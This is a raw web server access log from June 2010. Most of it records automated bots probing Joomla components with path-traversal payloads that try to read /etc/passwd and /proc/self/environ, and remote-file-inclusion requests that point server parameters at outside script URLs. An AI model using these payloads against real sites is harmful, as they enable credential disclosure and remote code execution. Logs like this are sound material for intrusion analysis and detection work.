189.108.172.26 - - [23/Jun/2010:06:02:55 -0400] "GET /logs//index.php/web2?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 218 "-" "libwww-perl/5.808"
189.108.172.26 - - [23/Jun/2010:06:02:56 -0400] "GET /logs/access_log.Q110061500//index.php/web2?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 240 "-" "libwww-perl/5.808"
189.108.172.26 - - [23/Jun/2010:06:03:00 -0400] "GET //index.php/web2?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 213 "-" "libwww-perl/5.808"
209.59.12.99 - - [23/Jun/2010:06:03:05 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
209.59.202.38 - - [23/Jun/2010:06:04:20 -0400] "GET /logs/access_log.Q109110900//components/com_rwcards/captcha/captcha_image.php?img=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 274 "-" "libwww-perl/5.831"
209.59.202.38 - - [23/Jun/2010:06:04:20 -0400] "GET //components/com_rwcards/captcha/captcha_image.php?img=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 247 "-" "libwww-perl/5.831"
209.59.202.38 - - [23/Jun/2010:06:04:20 -0400] "GET /logs//components/com_rwcards/captcha/captcha_image.php?img=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 252 "-" "libwww-perl/5.831"
74.54.22.2 - - [23/Jun/2010:06:04:26 -0400] "GET /logs/error_log.Q110060800//index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
74.54.22.2 - - [23/Jun/2010:06:04:26 -0400] "GET //index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
74.54.22.2 - - [23/Jun/2010:06:04:26 -0400] "GET /logs//index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 213 "-" "libwww-perl/5.805"
74.54.22.2 - - [23/Jun/2010:06:04:29 -0400] "GET //index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
189.108.172.26 - - [23/Jun/2010:06:04:41 -0400] "GET /logs/access_log.Q110060700//index.php/web2?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 240 "-" "libwww-perl/5.808"
64.27.19.114 - - [23/Jun/2010:06:04:41 -0400] "GET /index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 207 "-" "libwww-perl/5.831"
74.54.22.2 - - [23/Jun/2010:06:04:45 -0400] "GET /logs/access_log.Q110061300//index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
189.108.172.26 - - [23/Jun/2010:06:04:47 -0400] "GET /logs/access_log.Q110061500//index.php/web2?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 240 "-" "libwww-perl/5.808"
200.202.243.41 - - [23/Jun/2010:06:06:24 -0400] "GET /index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 207 "-" "libwww-perl/5.813"
189.108.172.26 - - [23/Jun/2010:06:07:03 -0400] "GET //index.php/web2?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 213 "-" "libwww-perl/5.808"
189.108.172.26 - - [23/Jun/2010:06:07:03 -0400] "GET /logs/access_log.Q110061100%20//index.php/web2?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 241 "-" "libwww-perl/5.808"
189.108.172.26 - - [23/Jun/2010:06:07:16 -0400] "GET /logs/access_log.Q110061500%20//index.php/web2?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 241 "-" "libwww-perl/5.808"
209.59.202.38 - - [23/Jun/2010:06:07:20 -0400] "GET //components/com_rwcards/captcha/captcha_image.php?img=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 247 "-" "libwww-perl/5.831"
209.59.202.38 - - [23/Jun/2010:06:07:21 -0400] "GET //components/com_rwcards/captcha/captcha_image.php?img=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 247 "-" "libwww-perl/5.831"
204.15.37.220 - - [23/Jun/2010:06:07:30 -0400] "POST /contact.php HTTP/1.1" 404 209 "-" "Casper Bot Search"
204.15.37.220 - - [23/Jun/2010:06:07:30 -0400] "POST /logs/contact.php HTTP/1.1" 404 214 "-" "Casper Bot Search"
204.15.37.220 - - [23/Jun/2010:06:07:30 -0400] "POST /contact.php HTTP/1.1" 404 209 "-" "Casper Bot Search"
204.15.37.220 - - [23/Jun/2010:06:07:30 -0400] "POST /logs/contact.php HTTP/1.1" 404 214 "-" "Casper Bot Search"
66.249.71.27 - - [23/Jun/2010:06:07:32 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L826887628B706000EBA802C+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
95.108.245.251 - - [23/Jun/2010:06:08:51 -0400] "GET /logs/error_log.Q110052700 HTTP/1.1" 304 - "-" "Yandex/1.01.001 (compatible; Win16; I)"
209.59.202.38 - - [23/Jun/2010:06:09:06 -0400] "GET /logs/access_log.Q110051800//components/com_rwcards/captcha/captcha_image.php?img=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 274 "-" "libwww-perl/5.831"
209.59.202.38 - - [23/Jun/2010:06:09:06 -0400] "GET /logs/access_log.Q110051800//components/com_rwcards/captcha/captcha_image.php?img=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 274 "-" "libwww-perl/5.831"
209.59.202.38 - - [23/Jun/2010:06:09:06 -0400] "GET //components/com_rwcards/captcha/captcha_image.php?img=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 247 "-" "libwww-perl/5.831"
209.59.202.38 - - [23/Jun/2010:06:09:06 -0400] "GET //components/com_rwcards/captcha/captcha_image.php?img=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 247 "-" "libwww-perl/5.831"
209.59.202.38 - - [23/Jun/2010:06:09:06 -0400] "GET /logs//components/com_rwcards/captcha/captcha_image.php?img=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 252 "-" "libwww-perl/5.831"
209.59.202.38 - - [23/Jun/2010:06:09:06 -0400] "GET /logs//components/com_rwcards/captcha/captcha_image.php?img=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 252 "-" "libwww-perl/5.831"
222.236.47.182 - - [23/Jun/2010:06:09:12 -0400] "GET //admin/editor2/spaw_control.class.php?spaw_root=http://www.howtolisten.kr/lct/exam3/81/auto2.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
222.236.47.182 - - [23/Jun/2010:06:09:13 -0400] "GET /logs/access_log.Q110011600//admin/editor2/spaw_control.class.php?spaw_root=http://www.howtolisten.kr/lct/exam3/81/auto2.txt? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
222.236.47.182 - - [23/Jun/2010:06:09:13 -0400] "GET /logs//admin/editor2/spaw_control.class.php?spaw_root=http://www.howtolisten.kr/lct/exam3/81/auto2.txt? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
209.59.12.99 - - [23/Jun/2010:06:11:06 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
83.169.36.169 - - [23/Jun/2010:06:11:16 -0400] "GET //?_SERVER[DOCUMENT_ROOT]=http://www.caixinunes.pt/includes/js/dtree/x2??? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
83.169.36.169 - - [23/Jun/2010:06:11:16 -0400] "GET /logs/access_log.Q109111400//?_SERVER[DOCUMENT_ROOT]=http://www.caixinunes.pt/includes/js/dtree/x2??? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
83.169.36.169 - - [23/Jun/2010:06:11:16 -0400] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.caixinunes.pt/includes/js/dtree/x2??? HTTP/1.1" 200 55559 "-" "Mozilla/5.0"
83.169.36.169 - - [23/Jun/2010:06:11:17 -0400] "GET //?_SERVER[DOCUMENT_ROOT]=http://www.caixinunes.pt/includes/js/dtree/x2??? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
83.169.36.169 - - [23/Jun/2010:06:11:17 -0400] "GET /logs/access_log.Q109111400//?_SERVER[DOCUMENT_ROOT]=http://www.caixinunes.pt/includes/js/dtree/x2??? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
83.169.36.169 - - [23/Jun/2010:06:11:17 -0400] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.caixinunes.pt/includes/js/dtree/x2??? HTTP/1.1" 200 55559 "-" "Mozilla/5.0"
209.59.202.38 - - [23/Jun/2010:06:12:22 -0400] "GET /logs/access_log.Q109110900//components/com_rwcards/captcha/captcha_image.php?img=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 274 "-" "libwww-perl/5.831"
209.59.202.38 - - [23/Jun/2010:06:12:22 -0400] "GET /logs/access_log.Q109110900//components/com_rwcards/captcha/captcha_image.php?img=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 274 "-" "libwww-perl/5.831"
200.202.243.41 - - [23/Jun/2010:06:12:24 -0400] "GET /logs/access_log.Q110060900/?option=com_agora&task=profile&page=avatars&action=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 225 "-" "libwww-perl/5.813"
200.202.243.41 - - [23/Jun/2010:06:12:25 -0400] "GET /?option=com_agora&task=profile&page=avatars&action=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 409 "-" "libwww-perl/5.813"
200.202.243.41 - - [23/Jun/2010:06:12:25 -0400] "GET /logs/?option=com_agora&task=profile&page=avatars&action=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 55554 "-" "libwww-perl/5.813"
67.148.93.62 - - [23/Jun/2010:06:12:27 -0400] "GET /index2.php?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.813"
85.214.85.210 - - [23/Jun/2010:06:12:30 -0400] "GET /logs/access_log.Q110061200/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 225 "-" "libwww-perl/5.69"
85.214.85.210 - - [23/Jun/2010:06:12:30 -0400] "GET /?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 409 "-" "libwww-perl/5.69"
85.214.85.210 - - [23/Jun/2010:06:12:30 -0400] "GET /logs/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 55554 "-" "libwww-perl/5.69"
67.246.124.14 - - [23/Jun/2010:06:13:00 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; MRA 4.10 (build 01952); GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618; WinNT-PAI 03.09.2009)"
67.246.124.14 - - [23/Jun/2010:06:13:00 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; MRA 4.10 (build 01952); GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618; WinNT-PAI 03.09.2009)"
67.246.124.14 - - [23/Jun/2010:06:13:01 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; MRA 4.10 (build 01952); GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618; WinNT-PAI 03.09.2009)"
67.246.124.14 - - [23/Jun/2010:06:13:01 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; MRA 4.10 (build 01952); GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618; WinNT-PAI 03.09.2009)"
64.27.19.114 - - [23/Jun/2010:06:13:12 -0400] "GET /logs/error_log.Q110061400/index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 233 "-" "libwww-perl/5.831"
64.27.19.114 - - [23/Jun/2010:06:13:12 -0400] "GET /index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 207 "-" "libwww-perl/5.831"
64.27.19.114 - - [23/Jun/2010:06:13:13 -0400] "GET /logs/index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 212 "-" "libwww-perl/5.831"
83.169.36.169 - - [23/Jun/2010:06:13:38 -0400] "GET //?_SERVER[DOCUMENT_ROOT]=http://www.cctv-spares.com/includes/js/ts???? HTTP/1.1" 200 452 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)"
83.169.36.169 - - [23/Jun/2010:06:13:38 -0400] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.cctv-spares.com/includes/js/ts???? HTTP/1.1" 200 55559 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)"
67.195.114.223 - - [23/Jun/2010:06:13:13 -0400] "GET /logs/error_log.Q110020500 HTTP/1.0" 200 4168575 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
68.109.233.150 - - [23/Jun/2010:06:14:37 -0400] "GET /logs/error_log.Q110061400//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 234 "-" "libwww-perl/5.79"
68.109.233.150 - - [23/Jun/2010:06:14:40 -0400] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.79"
68.109.233.150 - - [23/Jun/2010:06:14:49 -0400] "GET /logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 213 "-" "libwww-perl/5.79"
95.108.245.251 - - [23/Jun/2010:06:15:32 -0400] "GET /logs/error_log.Q109060100 HTTP/1.1" 304 - "-" "Yandex/1.01.001 (compatible; Win16; I)"
66.249.71.27 - - [23/Jun/2010:06:15:50 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L826887628AD04000E3A802C+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
163.20.26.5 - - [23/Jun/2010:06:16:01 -0400] "GET /index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 207 "-" "libwww-perl/5.79"
222.236.47.182 - - [23/Jun/2010:06:16:59 -0400] "GET /logs/access_log.Q109101500%20%20//admin/editor2/spaw_control.class.php?spaw_root=http://www.howtolisten.kr/lct/exam3/81/auto2.txt? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
222.236.47.182 - - [23/Jun/2010:06:17:02 -0400] "GET /logs/access_log.Q110010700%20%20//admin/editor2/spaw_control.class.php?spaw_root=http://www.howtolisten.kr/lct/exam3/81/auto2.txt? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
204.15.37.220 - - [23/Jun/2010:06:17:08 -0400] "POST /contact.php HTTP/1.1" 404 209 "-" "Casper Bot Search"
204.15.37.220 - - [23/Jun/2010:06:17:08 -0400] "POST /logs/contact.php HTTP/1.1" 404 214 "-" "Casper Bot Search"
204.15.37.220 - - [23/Jun/2010:06:17:08 -0400] "POST /contact.php HTTP/1.1" 404 209 "-" "Casper Bot Search"
204.15.37.220 - - [23/Jun/2010:06:17:08 -0400] "POST /logs/contact.php HTTP/1.1" 404 214 "-" "Casper Bot Search"
91.121.31.161 - - [23/Jun/2010:06:17:27 -0400] "GET /logs/access_log.Q110030500/?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 225 "-" "libwww-perl/5.803"
91.121.31.161 - - [23/Jun/2010:06:17:27 -0400] "GET /?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 409 "-" "libwww-perl/5.803"
91.121.31.161 - - [23/Jun/2010:06:17:27 -0400] "GET /logs/?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 55554 "-" "libwww-perl/5.803"
200.202.243.41 - - [23/Jun/2010:06:17:59 -0400] "GET /logs/error_log.Q110050400/?option=com_agora&task=profile&page=avatars&action=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 224 "-" "libwww-perl/5.813"
200.202.243.41 - - [23/Jun/2010:06:18:54 -0400] "GET /logs/error_log.Q110061400/index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 233 "-" "libwww-perl/5.813"
200.202.243.41 - - [23/Jun/2010:06:18:55 -0400] "GET /index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 207 "-" "libwww-perl/5.813"
200.202.243.41 - - [23/Jun/2010:06:18:55 -0400] "GET /logs/index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 212 "-" "libwww-perl/5.813"
209.59.12.99 - - [23/Jun/2010:06:19:06 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
91.121.31.161 - - [23/Jun/2010:06:19:08 -0400] "GET /logs/error_log.Q110052600/?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 224 "-" "libwww-perl/5.803"
91.121.31.161 - - [23/Jun/2010:06:19:09 -0400] "GET /?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 409 "-" "libwww-perl/5.803"
91.121.31.161 - - [23/Jun/2010:06:19:09 -0400] "GET /logs/?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 55554 "-" "libwww-perl/5.803"
91.121.31.161 - - [23/Jun/2010:06:19:18 -0400] "GET /?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 409 "-" "libwww-perl/5.803"
66.194.249.108 - - [23/Jun/2010:06:19:43 -0400] "GET //include/admin.lib.inc.php?site_path=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
66.194.249.108 - - [23/Jun/2010:06:19:43 -0400] "GET /logs//include/admin.lib.inc.php?site_path=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
66.194.249.108 - - [23/Jun/2010:06:19:43 -0400] "GET /logs/access_log.Q109052200//include/admin.lib.inc.php?site_path=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
222.236.47.182 - - [23/Jun/2010:06:20:07 -0400] "GET //admin/editor2/spaw_control.class.php?spaw_root=http://www.howtolisten.kr/lct/exam3/81/auto2.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
222.236.47.182 - - [23/Jun/2010:06:20:08 -0400] "GET /logs//admin/editor2/spaw_control.class.php?spaw_root=http://www.howtolisten.kr/lct/exam3/81/auto2.txt? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
222.236.47.182 - - [23/Jun/2010:06:20:09 -0400] "GET /logs/access_log.Q109101500%20%20//admin/editor2/spaw_control.class.php?spaw_root=http://www.howtolisten.kr/lct/exam3/81/auto2.txt? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
222.236.47.182 - - [23/Jun/2010:06:20:11 -0400] "GET /logs/access_log.Q110010700%20%20//admin/editor2/spaw_control.class.php?spaw_root=http://www.howtolisten.kr/lct/exam3/81/auto2.txt? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
72.35.80.52 - - [23/Jun/2010:06:20:11 -0400] "GET //include/admin.lib.inc.php?site_path=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
72.35.80.52 - - [23/Jun/2010:06:20:11 -0400] "GET /logs//include/admin.lib.inc.php?site_path=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
72.35.80.52 - - [23/Jun/2010:06:20:11 -0400] "GET /logs/access_log.Q109052200//include/admin.lib.inc.php?site_path=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
66.194.249.108 - - [23/Jun/2010:06:20:42 -0400] "GET /logs/access_log.Q109052200%20%20//include/admin.lib.inc.php?site_path=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
91.121.31.161 - - [23/Jun/2010:06:20:52 -0400] "GET /logs/access_log.Q110030500/?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 225 "-" "libwww-perl/5.803"
91.121.31.161 - - [23/Jun/2010:06:20:52 -0400] "GET /logs/access_log.Q110030500/?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 225 "-" "libwww-perl/5.803"
91.121.31.161 - - [23/Jun/2010:06:20:52 -0400] "GET /?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 409 "-" "libwww-perl/5.803"
91.121.31.161 - - [23/Jun/2010:06:20:53 -0400] "GET /?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 409 "-" "libwww-perl/5.803"
91.121.31.161 - - [23/Jun/2010:06:20:53 -0400] "GET /logs/?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 55554 "-" "libwww-perl/5.803"
91.121.31.161 - - [23/Jun/2010:06:20:53 -0400] "GET /logs/?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 55554 "-" "libwww-perl/5.803"
72.35.80.52 - - [23/Jun/2010:06:20:55 -0400] "GET /logs/access_log.Q109052200%20%20//include/admin.lib.inc.php?site_path=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
93.186.192.124 - - [23/Jun/2010:06:21:11 -0400] "GET /logs/access_log.Q110052500//pingserver.php HTTP/1.1" 404 240 "-" "libwww-perl/5.813"
93.186.192.124 - - [23/Jun/2010:06:21:11 -0400] "GET //pingserver.php HTTP/1.1" 404 213 "-" "libwww-perl/5.813"
93.186.192.124 - - [23/Jun/2010:06:21:11 -0400] "GET /logs//pingserver.php HTTP/1.1" 404 218 "-" "libwww-perl/5.813"
91.121.31.161 - - [23/Jun/2010:06:21:38 -0400] "GET /logs/access_log.Q110012000/?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 225 "-" "libwww-perl/5.803"
91.121.31.161 - - [23/Jun/2010:06:21:38 -0400] "GET /?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 409 "-" "libwww-perl/5.803"
91.121.31.161 - - [23/Jun/2010:06:21:38 -0400] "GET /logs/?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 55554 "-" "libwww-perl/5.803"
91.121.31.161 - - [23/Jun/2010:06:21:41 -0400] "GET /logs/access_log.Q110012000/?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 225 "-" "libwww-perl/5.803"
91.121.31.161 - - [23/Jun/2010:06:21:42 -0400] "GET /?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 409 "-" "libwww-perl/5.803"
91.121.31.161 - - [23/Jun/2010:06:21:42 -0400] "GET /logs/?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 55554 "-" "libwww-perl/5.803"
66.194.249.108 - - [23/Jun/2010:06:21:43 -0400] "GET /logs/access_log.Q109121200%20%20//include/admin.lib.inc.php?site_path=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
72.35.80.52 - - [23/Jun/2010:06:21:56 -0400] "GET /logs/access_log.Q109121200%20%20//include/admin.lib.inc.php?site_path=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
91.121.31.161 - - [23/Jun/2010:06:22:07 -0400] "GET /logs/access_log.Q110053000/?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 225 "-" "libwww-perl/5.803"
91.121.31.161 - - [23/Jun/2010:06:22:07 -0400] "GET /?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 409 "-" "libwww-perl/5.803"
91.121.31.161 - - [23/Jun/2010:06:22:07 -0400] "GET /logs/?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 55554 "-" "libwww-perl/5.803"
67.195.114.223 - - [23/Jun/2010:06:21:23 -0400] "GET /logs/error_log.Q109081600 HTTP/1.0" 200 5108052 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
95.108.245.251 - - [23/Jun/2010:06:22:13 -0400] "GET /logs/error_log.Q110020600 HTTP/1.1" 304 - "-" "Yandex/1.01.001 (compatible; Win16; I)"
91.121.31.161 - - [23/Jun/2010:06:22:27 -0400] "GET /logs/access_log.Q110030500/?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 225 "-" "libwww-perl/5.803"
91.121.31.161 - - [23/Jun/2010:06:22:30 -0400] "GET /logs/access_log.Q110030500/?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 225 "-" "libwww-perl/5.803"
91.121.31.161 - - [23/Jun/2010:06:22:31 -0400] "GET /logs/access_log.Q110032800/?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 225 "-" "libwww-perl/5.803"
91.121.31.161 - - [23/Jun/2010:06:22:31 -0400] "GET /?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 409 "-" "libwww-perl/5.803"
91.121.31.161 - - [23/Jun/2010:06:22:31 -0400] "GET /logs/?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 55554 "-" "libwww-perl/5.803"
67.148.93.62 - - [23/Jun/2010:06:22:34 -0400] "GET /logs/error_log.Q110052700/index2.php?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 234 "-" "libwww-perl/5.813"
67.148.93.62 - - [23/Jun/2010:06:22:35 -0400] "GET /index2.php?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.813"
67.148.93.62 - - [23/Jun/2010:06:22:41 -0400] "GET /logs/index2.php?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 213 "-" "libwww-perl/5.813"
67.195.114.223 - - [23/Jun/2010:06:22:12 -0400] "GET /logs/error_log.Q109081600 HTTP/1.0" 200 5108052 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
67.148.93.62 - - [23/Jun/2010:06:23:01 -0400] "GET /logs/access_log.Q110052700/index2.php?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 235 "-" "libwww-perl/5.813"
91.121.31.161 - - [23/Jun/2010:06:23:05 -0400] "GET /logs/error_log.Q110032800/?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 224 "-" "libwww-perl/5.803"
91.121.31.161 - - [23/Jun/2010:06:23:15 -0400] "GET /logs/error_log.Q110030500/?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 224 "-" "libwww-perl/5.803"
